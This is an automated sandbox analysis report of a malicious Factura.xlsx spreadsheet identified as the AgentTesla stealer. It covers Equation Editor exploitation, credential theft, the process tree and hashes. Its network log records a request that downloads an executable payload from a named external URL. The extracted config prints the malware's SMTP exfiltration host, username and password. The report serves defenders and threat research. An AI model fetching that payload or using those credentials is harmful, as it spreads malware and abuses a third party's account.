Overview

overview

10

Static

static

1

Factura.xlsx

windows7-x64

10

Factura.xlsx

windows10-2004-x64

1

Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    19/09/2024, 07:02 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Factura.xlsx

  • Size

    3.9MB

  • MD5

    5ffc2a72ff05e1f486e4aa0142b89a23

  • SHA1

    1d7428dd31e095b0aa43a61c962e7d42587c3f0c

  • SHA256

    0f626eca4a80a70619bded3da7db0cbac8de8effb65482cdf05962ff789155be

  • SHA512

    3b9753133f33901cc5fe4cc9e13ddb860b6a4cbae572ba4aad0149589c4b162caa9352dc57831d9c532367e5f978e22de34612566990fd0e83aaba4797cec7d4

  • SSDEEP

    98304:fxCNiZcsxN2HwHTiOsR1PWdVUnugvD50Dm:ZC8ZcsiOPdEugvDV

Score
10/10
agentteslacollectioncredential_accessdiscoverykeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     smtp
  • Host:
    mail.solucionesmexico.mx
  • Port:
    587
  • Username:
    security@solucionesmexico.mx
  • Password:
    Qdk,[nKrmI0j
  • Email To:
    security@solucionesmexico.mx

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

    exploit
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Factura.xlsx
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1748
  • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Blocklisted process makes network request
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:2708
    • C:\Users\Admin\AppData\Local\Temp\givesa.exe
      C:\Users\Admin\AppData\Local\Temp\givesa.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:2772
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        C:\Users\Admin\AppData\Local\Temp\givesa.exe
        3⤵
        • Accesses Microsoft Outlook profiles
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • outlook_office_path
        • outlook_win_path
        PID:2056

Network

  • flag-us
    DNS
    sscc.com.pk
    EQNEDT32.EXE
    Remote address:
    8.8.8.8:53
    Request
    sscc.com.pk
    IN A
    Response
    sscc.com.pk
    IN A
    65.108.31.28
  • flag-us
    DNS
    sscc.com.pk
    EQNEDT32.EXE
    Remote address:
    8.8.8.8:53
    Request
    sscc.com.pk
    IN A
  • flag-fi
    GET
    http://sscc.com.pk/wp-content/upgrade/oscn/farm.exe
    EQNEDT32.EXE
    Remote address:
    65.108.31.28:80
    Request
    GET /wp-content/upgrade/oscn/farm.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: sscc.com.pk
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Thu, 19 Sep 2024 07:00:35 GMT
    Server: Apache/2
    Upgrade: h2,h2c
    Connection: Upgrade, Keep-Alive
    Last-Modified: Thu, 19 Sep 2024 04:44:04 GMT
    ETag: "10d77b-6227192742d00"
    Accept-Ranges: bytes
    Content-Length: 1103739
    Keep-Alive: timeout=2, max=100
    Content-Type: application/x-msdownload
  • 65.108.31.28:80
    http://sscc.com.pk/wp-content/upgrade/oscn/farm.exe
    http
    EQNEDT32.EXE
    32.9kB
     1.1MB
     594
    817

    HTTP Request

    GET http://sscc.com.pk/wp-content/upgrade/oscn/farm.exe

    HTTP Response

    200
  • 8.8.8.8:53
    sscc.com.pk
    dns
    EQNEDT32.EXE
    114 B
     73 B
     2
    1

    DNS Request

    sscc.com.pk

    DNS Request

    sscc.com.pk

    DNS Response

    65.108.31.28

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • \Users\Admin\AppData\Local\Temp\givesa.exe
    Filesize

    1.1MB

    MD5

    5e82584ed7739e18b4137b5e05d5167f

    SHA1

    308388caa070f0a7e2791c5d348d52fe1f9b4070

    SHA256

    91100ceceed13fa2497c0d3e8e186506f2a6566d6b8b651eec8437c67622893d

    SHA512

    bd7b61d5164c063814e7d039f415f81648fb6e6fcc6fb8f0f8bcfc6aecc9caaa1899f2e09613ca27f47aec6c2fc122a28cf9ad72a36a547168cdc0b164888a0b

    Download Submit

  • memory/1748-1-0x0000000071FED000-0x0000000071FF8000-memory.dmp

    Filesize

    44KB

    Download

  • memory/1748-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1748-22-0x0000000071FED000-0x0000000071FF8000-memory.dmp

    Filesize

    44KB

    Download

  • memory/2056-13-0x0000000000090000-0x00000000000C0000-memory.dmp

    Filesize

    192KB

    Download

  • memory/2056-21-0x0000000000090000-0x00000000000C0000-memory.dmp

    Filesize

    192KB

    Download

  • memory/2056-18-0x0000000000090000-0x00000000000C0000-memory.dmp

    Filesize

    192KB

    Download

  • memory/2056-14-0x0000000000090000-0x00000000000C0000-memory.dmp

    Filesize

    192KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.